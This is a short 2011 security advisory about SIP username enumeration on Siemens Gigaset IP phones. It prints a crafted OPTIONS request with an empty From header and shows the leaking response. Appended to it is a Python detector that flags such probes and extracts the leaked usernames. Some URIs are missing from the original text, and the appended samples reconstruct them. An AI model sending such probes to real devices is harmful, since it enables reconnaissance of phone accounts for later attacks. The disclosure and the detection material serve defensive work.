Siemens Gigaset IP series SIP username enumeration

Author: francesco.tornieri "At" verona-wireless.net
Summary: SIP responses permit user identification
Release Date: 23/08/2011
Criticality level: Low
Impact: Information leak
Device: Siemens Gigaset IP series (Tested A580IP)

Description:

I've configured my own device in this way:

------------------------
Siemens Gigaset SIP Configuration Form
------------------------
IP: 192.168.1.253
Authentication Name: 500
Authentication Password: 500
Username: 500
Display Name: dect

The Authentication Name and Username fields have to be the same, otherwise the device doesn't register to the PBX.

It's possible to enumerate SIP usernames through a crafted OPTIONS request: if you send an OPTIONS with a crafted null "From" header (ex: From: ), the response carries a "Contact" header that contains the phone's SIP Username field (ex: Contact: ).

------------------------
Crafted SIP OPTIONS example
------------------------
OPTIONS sip:@192.168.1.253:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.253:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
Max-Forwards: 70
From: ;tag=642d29cd-0671-e011-81a1-a1816009ca7a
To:
Call-ID: d168fe2114a87ab560886720ab19392c
CSeq: 199 OPTIONS
User-Agent: FT
Content-Length: 0

Response:
---
Received: SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.253:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport=36675;received=192.168.1.1
From: ;tag=642d29cd-0671-e011-81a1-a1816009ca7a
To: ;tag=2470224496
Call-ID: 581bac10541a39c50df52ed2d88297ff
CSeq: 199 OPTIONS
Contact: <----- 500 SIP Username field
...
---
Francesco Tornieri
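The exchange above is easy to spot on the wire: an OPTIONS request whose From header carries no user part, answered by a 200 OK whose Contact header names the handset's account. The following Python is an added detection example written for this page; it is not code from the advisory or from Siemens. It parses raw SIP messages (as a SIP-aware monitor or log processor would see them), flags OPTIONS requests with a missing, empty or user-less From header, and extracts any username a response leaks in Contact. The sample traffic is constructed from the advisory's values; the From and Contact URIs inside angle brackets did not survive extraction of the original, so the forms used here (sip:@host, sip:500@host) are assumptions.

```python
import re

# Compact header names defined by RFC 3261 that a parser must fold into the long forms.
COMPACT = {"f": "from", "t": "to", "m": "contact", "v": "via", "i": "call-id"}

# Matches a SIP/SIPS URI and captures the optional user part that precedes '@'.
URI_RE = re.compile(r"sips?:(?:(?P<user>[^@>;\s]*)@)?(?P<host>[^>;\s]+)", re.IGNORECASE)


def parse_sip(raw):
    """Split a SIP message into its start line and a dict of lower-cased header -> [values]."""
    lines = raw.replace("\r\n", "\n").split("\n")
    start = lines[0].strip()
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # the blank line ends the header section; any body follows it
        if ":" not in line:
            continue  # malformed header line, ignored rather than trusted
        name, value = line.split(":", 1)
        name = name.strip().lower()
        headers.setdefault(COMPACT.get(name, name), []).append(value.strip())
    return start, headers


def uri_user(header_value):
    """Return the user part of the first SIP URI in a header value ('' if absent or empty)."""
    match = URI_RE.search(header_value or "")
    if not match:
        return ""
    return match.group("user") or ""


def is_anonymous_options_probe(raw):
    """True for an OPTIONS request whose From header is missing, empty, or has no user part."""
    start, headers = parse_sip(raw)
    if start.split(" ", 1)[0].upper() != "OPTIONS":
        return False
    from_values = headers.get("from")
    if not from_values:
        return True  # RFC 3261 makes From mandatory, so its absence is itself anomalous
    return all(uri_user(v) == "" for v in from_values)


def contact_user_in_response(raw):
    """Return the username a response exposes in its Contact header, or None."""
    start, headers = parse_sip(raw)
    if not start.upper().startswith("SIP/2.0"):
        return None
    for value in headers.get("contact", []):
        user = uri_user(value)
        if user:
            return user
    return None


def review_exchange(request, response):
    """Summarise one request/response pair the way a SIP monitor would log it."""
    return {
        "anonymous_probe": is_anonymous_options_probe(request),
        "leaked_user": contact_user_in_response(response),
    }


# Constructed sample traffic modelled on the advisory's exchange (not a capture). The
# From/To/Contact URIs are assumed forms; the Via, tag, Call-ID and CSeq values are the page's.
PROBE = "\r\n".join([
    "OPTIONS sip:@192.168.1.253:5060 SIP/2.0",
    "Via: SIP/2.0/UDP 192.168.1.253:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport",
    "Max-Forwards: 70",
    "From: <sip:@192.168.1.253>;tag=642d29cd-0671-e011-81a1-a1816009ca7a",
    "To: <sip:192.168.1.253>",
    "Call-ID: d168fe2114a87ab560886720ab19392c",
    "CSeq: 199 OPTIONS",
    "User-Agent: FT",
    "Content-Length: 0",
    "",
])

REPLY = "\r\n".join([
    "SIP/2.0 200 OK",
    "Via: SIP/2.0/UDP 192.168.1.253:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport=36675;received=192.168.1.1",
    "From: <sip:@192.168.1.253>;tag=642d29cd-0671-e011-81a1-a1816009ca7a",
    "To: <sip:192.168.1.253>;tag=2470224496",
    "Call-ID: d168fe2114a87ab560886720ab19392c",
    "CSeq: 199 OPTIONS",
    "Contact: <sip:500@192.168.1.253:5060>",
    "Content-Length: 0",
    "",
])

# A legitimate keep-alive from a PBX (constructed): populated From user, compact header
# name, so it must not alert.
NORMAL_OPTIONS = "\r\n".join([
    "OPTIONS sip:500@192.168.1.253:5060 SIP/2.0",
    "f: <sip:pbx@192.168.1.1>;tag=abc123",
    "t: <sip:500@192.168.1.253>",
    "i: keepalive-0001",
    "CSeq: 1 OPTIONS",
    "",
])

if __name__ == "__main__":
    print(review_exchange(PROBE, REPLY))
    print(review_exchange(NORMAL_OPTIONS, REPLY))
```

On the mitigation side the same parser doubles as a pre-check for an outbound-response filter: a device or SBC that refuses to populate Contact for requests classified by is_anonymous_options_probe closes the leak the advisory describes without affecting normal keep-alives.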